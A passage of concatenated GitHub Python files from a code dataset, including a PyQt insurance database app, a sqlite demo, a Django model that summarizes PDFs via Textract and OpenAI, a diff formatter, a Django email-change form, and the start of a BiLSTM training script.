:return:\n \"\"\"\n connection = DatabaseConnection().connect()\n result = connection.execute(\"SELECT * FROM insurance\")\n self.table.setRowCount(0)\n for row_number, row_data in enumerate(result):\n self.table.insertRow(row_number)\n for column_number, data in enumerate(row_data):\n self.table.setItem(row_number, column_number,\n QTableWidgetItem(str(data)))\n connection.close()\n\n def insert(self):\n dialog = InsertDialog()\n dialog.exec()\n\n def search(self):\n dialog = SearchDialog()\n dialog.exec()\n\n def edit(self):\n dialog = EditDialog()\n dialog.exec()\n\n def delete(self):\n dialog = DeleteDialog()\n dialog.exec()\n\n def about(self):\n dialog = AboutDialog()\n dialog.exec()\n\n\nclass InsertDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Insert Insurance Data\")\n 
self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n layout = QVBoxLayout()\n\n # Add insurance name\n self.insurance_name = QLineEdit()\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Add combo box\n self.insurance_type = QComboBox()\n types = [\"Life Insurance\", \"Car Insurance\", \"House Insurance\"]\n self.insurance_type.addItems(types)\n layout.addWidget(self.insurance_type)\n\n # Add mobile widget\n self.mobile = QLineEdit()\n self.mobile.setPlaceholderText(\"Mobile\")\n layout.addWidget(self.mobile)\n\n # Add age widget\n self.age = QLineEdit()\n self.age.setPlaceholderText(\"Age\")\n layout.addWidget(self.age)\n\n # Add submit button\n button = QPushButton(\"Register\")\n button.clicked.connect(self.add_insurance)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def add_insurance(self):\n \"\"\"\n This function adds a new record to the database\n :return:\n \"\"\"\n name = self.insurance_name.text()\n insurance = self.insurance_type.itemText(self.insurance_type.\n currentIndex())\n mobile = self.mobile.text()\n age = self.age.text()\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"INSERT INTO insurance (name, insurance, mobile, age) \"\n \"VALUES (?, ?, ?, ?)\",\n (name, insurance, mobile, age))\n connection.commit()\n cursor.close()\n connection.close()\n main_window.load_data()\n\nclass SearchDialog(QDialog):\n def __init__(self):\n super().__init__()\n # Set window title and size\n self.setWindowTitle(\"Search Insurance Data\")\n self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n # Create layout and input widget\n layout = QVBoxLayout()\n self.insurance_name = QLineEdit()\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Create button\n button = QPushButton(\"Search\")\n button.clicked.connect(self.search)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def search(self):\n \"\"\"\n Function to search name in the database\n :return:\n \"\"\"\n # Connection the database\n name = self.insurance_name.text()\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n result = cursor.execute(\"SELECT * FROM insurance WHERE name = ?\",\n (name,))\n rows = list(result)\n print(rows)\n items = main_window.table.findItems(name, Qt.MatchFlag.\n MatchFixedString)\n for item in items:\n print(item)\n main_window.table.item(item.row(), 1).setSelected(True)\n\n cursor.close()\n connection.close()\n\n\nclass EditDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Update Insurance Data\")\n self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n layout = QVBoxLayout()\n # Get insurance name from selected row\n index = main_window.table.currentRow()\n insurance_name = main_window.table.item(index, 1).text()\n\n # Get id from selected row\n self.insurance_id = main_window.table.item(index, 0).text()\n # Get the current insurance name\n self.insurance_name = QLineEdit(insurance_name)\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Get the current insurance type\n insurance_type = main_window.table.item(index, 2).text()\n self.insurance_type = QComboBox()\n types = [\"Life Insurance\", \"Car Insurance\", \"House Insurance\"]\n self.insurance_type.addItems(types)\n self.insurance_type.setCurrentText(insurance_type)\n layout.addWidget(self.insurance_type)\n\n # Get the current phone number\n mobile = main_window.table.item(index, 
3).text()\n self.mobile = QLineEdit(mobile)\n self.mobile.setPlaceholderText(\"Mobile\")\n layout.addWidget(self.mobile)\n\n # Get the current age\n age = main_window.table.item(index, 4).text()\n self.age = QLineEdit(age)\n self.age.setPlaceholderText(\"Age\")\n layout.addWidget(self.age)\n\n # Add update button\n button = QPushButton(\"Update\")\n button.clicked.connect(self.update_insurance)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def update_insurance(self):\n \"\"\"\n This function updates information about the insured people\n :return:\n \"\"\"\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"UPDATE insurance SET name = ?, insurance = ?, \"\n \"mobile = ?, age = ? WHERE id = ?\",\n (self.insurance_name.text(),\n self.insurance_type.itemText(self.insurance_type.\n currentIndex()),\n self.mobile.text(),\n self.age.text(),\n self.insurance_id))\n connection.commit()\n cursor.close()\n connection.close()\n # Refresh the table\n main_window.load_data()\n\n\nclass DeleteDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Delete Insurance Data\")\n\n # Add delete confirmation box\n layout = QGridLayout()\n confirmation = QLabel(\"Are you sure you want the delete this record?\")\n yes = QPushButton(\"Yes\")\n no = QPushButton(\"No\")\n\n layout.addWidget(confirmation, 0, 0, 1, 2)\n layout.addWidget(yes, 1, 0)\n layout.addWidget(no, 1, 1)\n self.setLayout(layout)\n\n yes.clicked.connect(self.delete_insurance)\n\n def delete_insurance(self):\n \"\"\"\n This function deletes records in the database\n :return:\n \"\"\"\n # Get selected row index and insurance id\n index = main_window.table.currentRow()\n insurance_id = main_window.table.item(index, 0).text()\n\n # Connect the function with the database and set up the conditions\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"DELETE from insurance WHERE id = ?\", (insurance_id,))\n connection.commit()\n cursor.close()\n connection.close()\n # Refresh the table\n main_window.load_data()\n\n self.close()\n\n # Add the confirmation box with a message\n confirmation_widget = QMessageBox()\n confirmation_widget.setWindowTitle(\"Success\")\n confirmation_widget.setText(\"The record was deleted successfully\")\n confirmation_widget.exec()\n\n\napp = QApplication(sys.argv)\nmain_window = MainWindow()\nmain_window.show()\nmain_window.load_data()\nsys.exit(app.exec())\n","repo_name":"AdamStar9/Insurance-System-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22977907664","text":"import sqlite3\n\n# create connection and cursor\nconn = sqlite3.connect(':memory:')\ncursor = conn.cursor()\n\n# Create the three tables\ncursor.execute(\"CREATE TABLE IF NOT EXISTS cars(car_id INTEGER PRIMARY KEY, car_name TEXT, car_price REAL)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS suppliers(supplier_id INTEGER PRIMARY KEY, supplier_name TEXT, supplier_location TEXT)\")\ncursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS parts(part_id INTEGER PRIMARY KEY,part_name TEXT, part_price REAL,\n car_id INTEGER, supplier_id INTEGER, FOREIGN KEY(supplier_id) REFERENCES suppliers(supplier_id),\n FOREIGN KEY(car_id) REFERENCES cars(car_id))\"\"\")\n\n\n#Inserting data into our tables\ncursor.execute(\"\"\"INSERT INTO cars\nVALUES(1,'Mercedes',30000)\"\"\")\n\ncursor.execute(\"\"\"INSERT INTO 
suppliers\nVALUES(11,'General_motors','Japan')\"\"\")\n\ncursor.execute(\"\"\"INSERT INTO parts\nVALUES(121,'Sproket',12,1,11)\"\"\")\n\n\nconn.commit()\n\n#Using python objects with :+ dictionary placeholder\n\nclass Cars:\n def __init__(self,id,name,price):\n self.id = id\n self.name = name\n self.price = price\n\n\nclass Suppliers:\n def __init__(self,id,name,location):\n self.id = id\n self.name = name\n self.location = location\n\n\nclass Parts:\n def __init__(self,id,name,price,car_id,supplier_id):\n self.id = id\n self.name = name\n self.price = price\n self.car_id = car_id\n self.supplier_id = supplier_id\ncar1 = Cars(12,'Premio',20000)\n\ncursor.execute(\"\"\"\nINSERT INTO cars \nVALUES(:car_id,:car_name,:car_price)\"\"\",\n{'car_id':car1.id,'car_name':car1.name,'car_price':car1.price})\n\nconn.commit()\n\nsupplier1 = Suppliers(12,'Toyota','China')\ncursor.execute(\"\"\"\nINSERT INTO suppliers \nVALUES(:supplier_id,:supplier_name,:supplier_location)\"\"\",\n{'supplier_id':supplier1.id,'supplier_name':supplier1.name,'supplier_location':supplier1.location})\n\nconn.commit()\n\npart1 = Parts(10, 'Gears', 20, 12, 10)\npart2 = Parts(13,'Wheel',17,1,11)\ncursor.execute(\"\"\"\nINSERT INTO parts\nVALUES(:part_id,:part_name,:part_price,:car_id,:supplier_id)\"\"\",\n {'part_id':part1.id,'part_name':part1.name, 'part_price':part1.price, 'car_id':part1.car_id, 'supplier_id':part1.supplier_id} );\n\ncursor.execute(\"\"\"\nINSERT INTO parts\nVALUES(:part_id,:part_name,:part_price,:car_id,:supplier_id)\"\"\",\n {'part_id':part2.id,'part_name':part2.name, 'part_price':part2.price, 'car_id':part2.car_id, 'supplier_id':part2.supplier_id} );\nconn.commit()\n\n#Updating parts table\npart1.name = 'Engine_block'\ncursor.execute(\"\"\"\nUPDATE parts\nSET part_name=:part_name\nWHERE part_id=:part_id\n\"\"\",{'part_name':part1.name,'part_id':part1.id})\n\nconn.commit()\n\n#Deleting Items\ncursor.execute(\"\"\"\nDELETE FROM parts\nWHERE car_id<>:car_id \"\"\",\n {'car_id':car1.id})\n\nconn.commit()\n\ncursor.execute(\"\"\"SELECT * FROM cars\"\"\")\nprint(cursor.fetchall())\ncursor.execute(\"\"\"\nSELECT * \nFROM cars\nWHERE car_price=:car_price\"\"\",\n {'car_price':20000})\nprint(cursor.fetchall())\n\n\ncursor.execute(\"\"\"SELECT * FROM suppliers\"\"\")\nprint(cursor.fetchall())\n\ncursor.execute(\"\"\"\nSELECT * \nFROM suppliers\nWHERE supplier_name = :supplier_name\"\"\",\n {'supplier_name':supplier1.name})\nprint(cursor.fetchall())\n\ncursor.execute(\"\"\"SELECT * FROM parts\"\"\")\nprint(cursor.fetchall())\n\n\nconn.close()","repo_name":"elvisotieno/dynamicprogramming","sub_path":"SQL/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30130324451","text":"from Keyboard import Keyboard\nfrom UI import UI\nfrom Game import Game\nimport Unit\nimport States\nimport WelcomePage\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\n\n\ndef draw(canvas):\n\n global current_state, in_game, game, frame, ui\n print(\"in main: \" + current_state)\n if current_state is not States.STATES[1]:\n in_game = False\n # print(\"assigning in_game: \" + str(in_game))\n\n # loops through all the states:\n if current_state is States.STATES[0]:\n # print(\"In \" + str(States.STATES[0]) + \" condition\")\n current_state = WelcomePage.welcome_page_draw(frame, canvas, SIZE)\n print(\"current_state after button press: \" + 
str(current_state))\n\n elif current_state is States.STATES[1]:\n\n # Creates a new game instance if there isn't one yet\n if not in_game:\n game = Game(frame, SIZE)\n in_game = True\n\n current_state = game.game_draw(canvas)\n\n\ncurrent_state = States.STATES[0]\nUNIT = Unit.UNIT\nui = UI()\nin_game = False\n# define the size in terms of units\nSIZE = (UNIT * 10, UNIT * 8)\nkeyboard = Keyboard()\nframe = simplegui.create_frame(\"Frame\", SIZE[0], SIZE[1])\nframe.set_keydown_handler(keyboard.key_down)\nframe.set_keyup_handler(keyboard.key_up)\nframe.set_draw_handler(draw)\nframe.start()\n","repo_name":"Pickersgill/GamesGroup","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5451156175","text":"import sys\ninput = sys.stdin.readline\nnext_d = {1:2,2:1,3:4,4:3}\ndi,dj = [0,-1,1,0,0],[0,0,0,1,-1]\nR,C,M = map(int,input().split())\nboard = [[False for _ in range(C)]for _ in range(R)]\nans = 0\nfor _ in range(M):\n r,c,s,d,z = map(int,input().split())\n board[r-1][c-1] = (s,d,z)\nfor king in range(C):\n for i in range(R):\n if board[i][king]:\n s,d,z = board[i][king]\n board[i][king] = False\n ans+=z\n break\n tmp = {}\n for i in range(R):\n for j in range(C):\n if board[i][j]:\n s,d,z = board[i][j]\n board[i][j] = False\n ni = (i+di[d]*s)%(2*(R-1))\n nj = (j+dj[d]*s)%(2*(C-1))\n nd = d\n if ni>R-1 or nj>C-1:\n nd = next_d[d]\n if ni>R-1:\n ni = 2*(R-1)-ni\n else:\n nj = 2*(C-1)-nj\n if (ni,nj) in tmp:\n ss,dd,zz = tmp[(ni,nj)]\n if z>zz:\n tmp[(ni,nj)]=(s,nd,z)\n else:\n tmp[(ni,nj)]=(s,nd,z)\n for i,j in tmp:\n board[i][j] = tmp[(i,j)]\nprint(ans)","repo_name":"AhyeonKim/Algo-py-","sub_path":"BOJ/boj_17143_낚시왕.py","file_name":"boj_17143_낚시왕.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22647110294","text":"import os\n\nfrom django.core.files.base import ContentFile\nfrom django.db import models\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\nimport boto3\nfrom dotenv import load_dotenv\nimport openai\nfrom annoying.fields import AutoOneToOneField\n\nfrom apps.utils.models import BaseModel\nfrom ..users.models import CustomUser\nfrom .storage_backends import PrivateMediaStorage\n\nload_dotenv()\n\nAWS_ACCESS_KEY_ID = os.environ.get('TEXTRACT_CRED')\nAWS_SECRET_ACCESS_KEY = os.environ.get('TEXTRACT_PASS')\nAWS_REGION = os.environ.get('AWS_REGION')\n\n\nclass Document(BaseModel):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, related_name='documents')\n title = models.CharField(max_length=255, default=None)\n\n # file that holds the actual document\n file = models.FileField(storage=PrivateMediaStorage,\n upload_to=\"documents/\", default=None)\n\n text = models.JSONField(default=dict, blank=True, null=True)\n job_id = models.CharField(max_length=255, default=None, null=True, blank=True)\n\n ocr_text = models.TextField(default=None, null=True, blank=True)\n\n def is_processed(self):\n return self.job_id\n\n # convert created_at from GMT to local time\n def get_created_at(self):\n return self.created_at.astimezone()\n\n def __str__(self):\n return f'{self.title}'\n\n def clean(self):\n # check if the file is a pdf\n if not self.file.name.endswith('.pdf'):\n raise ValidationError(_('File must be a PDF'))\n\n # check if 
the file is less than 5mb\n        if self.file.size > 5242880:\n            raise ValidationError(_('File must be less than 5mb'))\n\n        # check if the file is empty\n        if self.file.size == 0:\n            raise ValidationError(_('File cannot be empty'))\n\n        # check if the file is a duplicate\n        if Document.objects.filter(file=self.file).exists():\n            raise ValidationError(_('File already exists'))\n\n        # trim whitespace from title\n        self.title = self.title.strip()\n\n
    def start_text_extraction(self):\n        # create a boto3 Textract client and start the text detection job\n        # on the file in the user's private s3 bucket\n        textract = boto3.client('textract', aws_access_key_id=AWS_ACCESS_KEY_ID,\n                                aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n                                region_name=AWS_REGION)\n\n        name = 'private/' + self.file.name\n\n        job_id = textract.start_document_text_detection(\n            DocumentLocation={\n                'S3Object': {\n                    'Bucket': os.environ.get('AWS_STORAGE_BUCKET'),\n                    'Name': name\n                }\n            })\n        self.job_id = job_id['JobId']\n        self.save()\n\n
    def get_text_extraction(self):\n        # if the job is still running, return None\n        # if the job succeeded (or was already processed), cache and return the text\n        if self.job_id == 'PROCESSED':\n            return self.text\n\n        textract = boto3.client('textract', aws_access_key_id=AWS_ACCESS_KEY_ID,\n                                aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n                                region_name=AWS_REGION)\n\n        response = textract.get_document_text_detection(JobId=self.job_id)\n\n        if response['JobStatus'] == 'IN_PROGRESS':\n            return None\n        elif response['JobStatus'] == 'FAILED':\n            return 'FAILED'\n        elif response['JobStatus'] == 'SUCCEEDED':\n            self.job_id = 'PROCESSED'\n            self.text = response\n            self.save()\n            return 'DONE'\n\n
    def extract_text(self):\n        # iteratively builds a string of the entire document\n        text = self.text\n        blocks = text['Blocks']\n        pages = []\n        doc_text = ''\n        for block in blocks:\n            if block['BlockType'] == 'PAGE':\n                pages.append(block['Page'])\n\n        # TODO: add processing by line location\n\n        for page in range(1, max(pages) + 1):\n            page_text = ''\n            for block in blocks:\n                # only collect the lines that belong to the current page\n                if block['BlockType'] == 'LINE' and block.get('Page') == page:\n                    page_text += block['Text'] + ' ' + '\\n'\n            doc_text += page_text + '\\n'\n\n        # save the text to the ocr_text field\n        self.ocr_text = doc_text\n        self.save()\n\n
    def create_summary(self):\n        \"\"\"\n        create a summary of the document\n        \"\"\"\n        openai.api_key = os.environ.get('OPENAI_KEY')\n        text_to_summarize = self.ocr_text\n\n        text_to_summarize = text_to_summarize.split('.')\n        # list of sentence strings\n        broken_text = []\n\n        block = []\n        block_size = 0\n        for sentence in text_to_summarize:  # string\n            # count characters in sentence\n            if block_size + len(sentence) < 12000:  # should be approximately within token length\n                block.append(sentence)\n                block_size += len(sentence)\n            # if the block is full, flush it and start a new block with this sentence\n            else:\n                broken_text.append(block)\n                block = [sentence]\n                block_size = len(sentence)\n            # if the sentence is the last sentence in the document, flush the final block\n            if sentence == text_to_summarize[-1]:\n                broken_text.append(block)\n\n
        summary = ''\n        for block in broken_text:\n            block_content = ' '.join(block).strip()\n            response = openai.Completion.create(\n                model=\"text-davinci-003\",\n                prompt=f'Summarize the given text for a university student.'\n                       f'Give them the most important information to '\n                       f'learn the content of this text.\\n'\n                       f'Given text: \\n {block_content} <|endoftext|>',\n                max_tokens=600,\n                
temperature=0.8,\n presence_penalty=.15,\n )\n # basically how you get the summary for each block\n summary += response['choices'][0]['text'] + '\\n'\n\n self.summary.content = summary\n self.summary.save()\n\n def create_questions(self):\n \"\"\"\n generate questions for the document\n \"\"\"\n openai.api_key = os.environ.get('OPENAI_KEY')\n text_to_generate_questions = self.summary.get_summary\n\n num_questions = len(text_to_generate_questions) / 100\n if num_questions <= 1:\n num_questions = 3\n\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f'Given this text, generate {num_questions} questions to test'\n f'understanding of the text. The questions should'\n f'be at the level of a university student, and test'\n f'recall of the content, background information, and application of the content'\n f'to other mediums. They should not be easy, unless they test recall.\\n'\n f'At least one of the questions should relate to an application of the content. \\n'\n f'Examples:\\n'\n f'Q: What is the main idea of this text?\\n'\n f'A: The author argues for institutional reform to improve the lives of the poor.\\n'\n f'Q: What does the term \\\"institutional reform\\\" mean?\\n'\n f'A: Institutional reform is a change in the way that a society is organized.\\n'\n f'Q: Why would institutional reform be necessary, according to the author?\\n'\n f'A: The author argues that the rich owe a moral debt to humanity.\\n'\n f'Q: What would institutional reform create? (The answer to this is not provided by the document)\\n'\n f'A: A more just society.\\n'\n f'Given text: \\n {text_to_generate_questions}'\n f'<|endoftext|>',\n max_tokens=600,\n temperature=0.8,\n presence_penalty=.3,\n )\n\n questions = response['choices'][0]['text']\n # questions will be in Q: \\n A: \\n format.\n # get question answer pairs, generated from paired Q: and A: prompts.\n question_pair = questions.split('Q: ')\n question_answer_pairs = []\n for pair in question_pair:\n if pair != '' or pair != '\\n\\n':\n question_answer_pairs.append(pair.split('A: '))\n\n # create question object for each pair\n for pair in question_answer_pairs:\n if len(pair) == 2:\n question = pair[0].strip()\n answer = pair[1].strip()\n Question.objects.create(\n question=question,\n answer=answer,\n document=self\n )\n\n\n# summary, questions are one-one field with document\n\nclass Summary(BaseModel):\n document = AutoOneToOneField(\"Document\", on_delete=models.CASCADE, related_name=\"summary\",\n default=None, primary_key=True)\n content = models.TextField(null=True, blank=True, default=None)\n\n @property\n def get_summary(self):\n return self.content\n\n def __str__(self):\n return f\"Summary of {self.document.title}\"\n\n\nclass Question(BaseModel):\n document = models.ForeignKey(\"Document\", on_delete=models.CASCADE, related_name=\"questions\",\n default=None)\n\n # delimited string, split by question mark\n question = models.TextField(default=None)\n answer = models.TextField(default=None)\n\n def __str__(self):\n return f\"Question of {self.document.title}\"\n","repo_name":"darinkishore/searing_ai","sub_path":"apps/data/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"23613350217","text":"from json import JSONEncoder\n\nfrom gendiff.search_difference import is_dictionary\n\nprefixes = {\n 'removed': ' - ',\n 'added': ' + ',\n 'not changed': ' ',\n 'updated': ' ',\n 'nested': ' 
    '\n}\n\n\ndef format_value(value, depth=0):\n    \"\"\"Returns the formatted value, if formatting is necessary\"\"\"\n    if type(value) == bool or value is None:\n        return JSONEncoder().encode(value)\n    elif is_dictionary(value):\n        return get_string_from_dictionary(value, depth + 1)\n    return str(value)\n\n\n
def format_stylish(diff, depth=0):\n    \"\"\"\n    Returns the formatted difference between two files in stylish format\n    arguments:\n        diff: raw difference between two files\n        depth: level of nesting to build the correct difference\n    \"\"\"\n    indent = '    ' * depth\n    difference = ['{']\n    keys = diff.keys()\n\n    for key in keys:\n        status = diff[key]['status']\n        string = get_formated_string(indent, status, diff, key, depth)\n        difference.append(string)\n    difference.append(f'{indent}}}')\n    return '\\n'.join(difference)\n\n\n
def get_formated_string(indent, status, diff, key, depth):\n    \"\"\"\n    Return a formatted string depending on the node's status\n    arguments:\n        indent: amount of whitespace to build the stylish representation\n        status: status of node\n        diff: difference between two files\n        key: current key\n        depth: node's level of nesting\n    \"\"\"\n    if status == 'added':\n        string = (f'{indent}{prefixes[\"added\"]}{key}: '\n                  f'{format_value(diff[key][\"value\"], depth)}')\n\n    elif status == 'removed':\n        string = (f'{indent}{prefixes[\"removed\"]}{key}: '\n                  f'{format_value(diff[key][\"value\"], depth)}')\n\n    elif status == 'not changed':\n        string = (f'{indent}{prefixes[\"not changed\"]}{key}: '\n                  f'{format_value(diff[key][\"value\"], depth)}')\n\n    elif status == 'updated':\n        string = (f'{indent}{prefixes[\"removed\"]}{key}: '\n                  f'{format_value(diff[key][\"value1\"], depth)}\\n'\n                  f'{indent}{prefixes[\"added\"]}{key}: '\n                  f'{format_value(diff[key][\"value2\"], depth)}')\n\n    elif status == 'nested':\n        string = (f'{indent}{prefixes[status]}{key}: '\n                  f'{format_stylish(diff[key][\"children\"], depth + 1)}')\n    return string\n\n\n
def get_string_from_dictionary(diff, depth):\n    \"\"\"\n    Return a string representation of the value if it is a dictionary\n    arguments:\n        diff: difference between two files\n        depth: node's level of nesting\n    \"\"\"\n    indent = '    ' * depth\n    nested_diff = []\n    if is_dictionary(diff):\n        nested_diff.append('{')\n        keys = diff.keys()\n        for key in keys:\n            string = (f'{indent}{prefixes[\"not changed\"]}{key}: '\n                      f'{get_string_from_dictionary(diff[key], depth + 1)}')\n            nested_diff.append(string)\n        nested_diff.append(f'{indent}}}')\n    else:\n        string = format_value(diff, depth)\n        nested_diff.append(string)\n    return '\\n'.join(nested_diff)\n","repo_name":"SaltyFingers/python-project-lvl2","sub_path":"gendiff/formaters/stylish.py","file_name":"stylish.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"40909878063","text":"from agenda import Agenda\nfrom chart import Chart\n\n\nclass Parser(object):\n    def __init__(self, logger=None):\n        self.logger = logger\n\n    def parse(self, start_symbol, lexicon, grammar, sentence):\n        agenda = Agenda(self.logger)\n        chart = Chart(grammar, agenda, logger=self.logger)\n        chart.introduce_symbol(start_symbol, 0)\n        position = 0\n        while position < len(sentence) or agenda.size() > 0:\n            if agenda.size() == 0:\n                agenda.add_alternatives(\n                    lexicon.get_interpretations(sentence[position]), position)\n                position = position + 1\n            
chart.extend_arcs(agenda.next_constituent())\n","repo_name":"minopret/topdown","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8485936247","text":"\"\"\"Tokenize str|List[str] to sents.\"\"\"\n# pylint: disable=unused-argument\n\nfrom typing import (\n List,\n Optional,\n Union,\n)\n\nfrom pathlib import Path\nfrom joblib import Memory\nfrom polyglot.text import Detector\nfrom logzero import logger\n\nfrom hlm_texts.seg_text import seg_text\n\nmemory = Memory(location=Path(\"~/joblib_cache\").expanduser(), verbose=0)\n\n\n# fmt: off\n# @memory.cache(ignore=['debug'])\ndef _sent_tokenizer(\n text: Union[str, List[str]],\n lang: Optional[str] = None,\n debug: bool = False, # when True, disable joblib.Memory.cache\n) -> List[str]:\n # fmt: on\n \"\"\"Tokenize str|List[str] to sents.\"\"\"\n if isinstance(text, str):\n text = [text]\n\n if lang is None:\n try:\n lang = Detector(\" \".join(text)).language.code\n except Exception as exc:\n logger.warning(\"polyglot.text.Detector exc: %s, setting to 'en'\", exc)\n logger.info(\" Try to pass lang (e.g. lang='en') to sent_tokenizer\")\n lang = 'en'\n\n res = []\n for elm in text:\n res.extend(seg_text(elm, lang=lang))\n\n return res\n\n\nsent_tokenizer = memory.cache(_sent_tokenizer, ignore=['debug'])\n","repo_name":"ffreemt/hlm-texts","sub_path":"hlm_texts/sent_tokenizer.py","file_name":"sent_tokenizer.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22464397509","text":"from __future__ import unicode_literals\n\nfrom django import forms\nfrom django.utils.translation import ugettext as _\nfrom django_core.forms.mixins.users import UserAuthorizationRequiredForm\nfrom django_core.forms.widgets import ReadonlyWidget\nfrom umanage.change_email.emails import send_change_email_activation_email\nfrom umanage.change_email.emails import send_change_email_notice_email\nfrom umanage.models import ChangeEmailAuthorization\n\n\nclass ChangeEmailForm(UserAuthorizationRequiredForm):\n \"\"\"Form for changing a user's email.\"\"\"\n error_messages = dict(UserAuthorizationRequiredForm.error_messages, **{\n 'invalid_confirm_email': _(\"The new email and new email confirm must \"\n \"match exactly. Please enter it again.\"),\n })\n current_email = forms.EmailField(label=_('Current Email'),\n max_length=100, widget=ReadonlyWidget,\n required=False)\n new_email = forms.EmailField(label=_('New Email'))\n new_email_confirm = forms.EmailField(label=_('New Email Confirm'))\n\n def __init__(self, *args, **kwargs):\n super(ChangeEmailForm, self).__init__(*args, **kwargs)\n\n if 'current_email' not in self.initial:\n self.initial['current_email'] = self.user.email\n\n self.fields.keyOrder = ('current_email', 'password', 'new_email',\n 'new_email_confirm')\n\n def clean_new_email_confirm(self):\n new_email = self.cleaned_data['new_email']\n new_email_confirm = self.cleaned_data['new_email_confirm']\n\n if new_email != new_email_confirm:\n raise forms.ValidationError(\n self.error_messages['invalid_confirm_email'],\n code='invalid_confirm_email',\n )\n\n return new_email_confirm\n\n def send_email(self):\n \"\"\"Sends the necessary emails and returns the ChangeEmail object. 
This\n method assumes the form has already made a call to ``.clean(...)``.\n \"\"\"\n authorization = ChangeEmailAuthorization.objects.create(\n email_address=self.cleaned_data.get('new_email'),\n created_user=self.user\n )\n send_change_email_notice_email(\n to_user=self.user,\n authorization=authorization\n )\n send_change_email_activation_email(\n to_user=self.user,\n to_email=self.cleaned_data.get('new_email'),\n authorization=authorization\n )\n return authorization\n","repo_name":"InfoAgeTech/django-umanage","sub_path":"umanage/change_email/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"30142561257","text":"import sys\nfrom argparse import ArgumentParser\nfrom os.path import expandvars\n\nimport pylab as P\nfrom matplotlib import rc\n\nfrom . argumentparsing import parse_strip_known_args\n\ndef set_latex_defaults():\n rc('ps',usedistiller='xpdf')\n rc('text', usetex=True)\n rc('font', family='serif', serif=\"Computer Modern Roman\")\n\n\n\ndef get_bw():\n parser = ArgumentParser()\n parser.add_argument(\"--bw\", action=\"store_true\", default=False)\n args=parse_strip_known_args(parser)\n global bw\n bw=args.bw\n return bw\n\n\ndef save(base):\n base=expandvars(base)\n if bw:\n P.savefig('%s_bw.pdf' % base)\n P.savefig('%s_bw.eps' % base)\n else:\n P.savefig('%s_color.pdf' % base)\n P.savefig('%s_color.eps' % base)\n\n","repo_name":"joshualande/PhD-python","sub_path":"lande/utilities/pubplot.py","file_name":"pubplot.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"22107698129","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: pkishore\n\"\"\"\nimport torch\nfrom torchtext import data\nimport torch.nn as nn\nfrom torch import optim\nimport numpy as np\nimport time, random\nimport os\nfrom tqdm import tqdm\nfrom gensim.models import KeyedVectors\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom BiLSTM import BiLSTM\n\nBATCH_SIZE = 50 #Number of examples in the batch.\nEPOCHS = 10 #Number of Epochs\nUSE_GPU = torch.cuda.is_available() #Is GPU Available\nEMBEDDING_DIM = 300 #Input or Embedding Dimension\nHIDDEN_DIM = 200 #Hidden Dimension\nvector_file = './data/embeddings.vec' #Path for Fasttext Embeddings\nbest_dev_acc = 0.0\n\ntext_field = data.Field(lower=True)\nlabel_field = data.Field(sequential=False)\n#For loading training, validation and test corpuses using split method\ntrain, valid, test = data.TabularDataset.splits(path='./data/dataset', train = 'newtrain.txt',\n validation = 'newvalidation.txt',\n test = 'newtest.txt',\n fields = [('sentence', text_field), ('isQuestion', label_field)],\n format = 'csv', \n csv_reader_params = {'delimiter': '|'})\n#Construct the Vocab object for text and label field from train, validation and test 